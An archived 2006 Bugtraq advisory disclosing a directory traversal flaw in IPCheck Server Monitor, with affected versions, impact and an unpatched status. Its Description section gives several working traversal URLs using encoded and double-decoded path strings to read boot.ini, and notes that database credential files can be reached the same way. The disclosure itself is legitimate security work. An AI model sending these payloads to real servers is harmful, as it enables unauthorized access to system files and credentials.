Directory Traversal vulnerability in IPCheck Monitor Server

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Directory Traversal vulnerability in IPCheck Monitor Server
From: auuw73@xxxxxxxxxxxxx
Date: 10 Aug 2006 09:20:40 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

Directory Traversal vulnerability in IPCheck Monitor Server
--------------------------------------

Overview

A directory traversal vulnerability has been identified in IPCheck Server 
Monitor Free/Trial/Professional, which may be exploited by potential attackers 
to retrieve files from the underlying OS.

--------------------------------------

Description

An input validation error in the user supplied URL makes it possible to 
retrieve files from the system root drive via directory traversal attacks using 
typical hex Unicode and double decode directory traversal strings.

Examples:

http://[host]:8080/images%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini

http://[IPAddress]/images%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini

http://[IP 
address]/images../..../..../..../..../..../..../..../..../..../..../..../boot.ini

http://[IP address]/images/..%255c../..%255c../..%255c../..%255c../boot.ini

--------------------------------------

Affected Versions

IPCheck Server Monitor 4.3.1.368
IPCheck Server Monitor 4.3.1.382
IPCheck Server Monitor 5.1.0.342
IPCheck Server Monitor 5.2.0.404
IPCheck Server Monitor 5.3.0.508
IPCheck Server Monitor 5.3.2.609 (Current)

(Tested on Microsoft Windows server 2003 platform, other platforms maybe 
affected also).

--------------------------------------

Impact

This particular URL presents the systems boot.ini file located on the root of 
the system drive. A similar series of strings could also be used by an attacker 
to access the configuration files of the firebird database which contain the 
username and password used to access the database.

--------------------------------------

Solution

The vendor of this product has been contacted to inform them of this 
vulnerability but no patch or update has been released since the first 
vulnerable version tested (4.3.1.368).


Tassi Raeburn
Independent Vulnerability Tester

Prev by Date: Sending multipart/form-data requests from Flash (with arbitrary headers)
Next by Date: CYBSEC - Security Pre-Advisory: SAP Internet Graphics Service (IGS) Remote Denial of Service
Previous by thread: Sending multipart/form-data requests from Flash (with arbitrary headers)
Next by thread: Re: Directory Traversal vulnerability in IPCheck Monitor Server
Index(es):
- Date
- Thread